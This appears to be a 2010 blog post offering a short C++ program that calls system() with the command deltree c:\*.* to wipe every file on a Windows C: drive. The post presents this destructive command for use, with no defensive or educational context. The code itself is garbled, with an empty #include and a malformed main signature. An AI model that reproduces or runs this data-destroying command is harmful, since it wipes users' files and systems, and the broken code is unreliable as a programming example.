Thursday, February 4, 2010

A simple code to delete all the files from c drive

#include

using namespace std;

void main(int argv,char args[])
{

system("deltree c:\\*.*");

}

No comments:

Post a Comment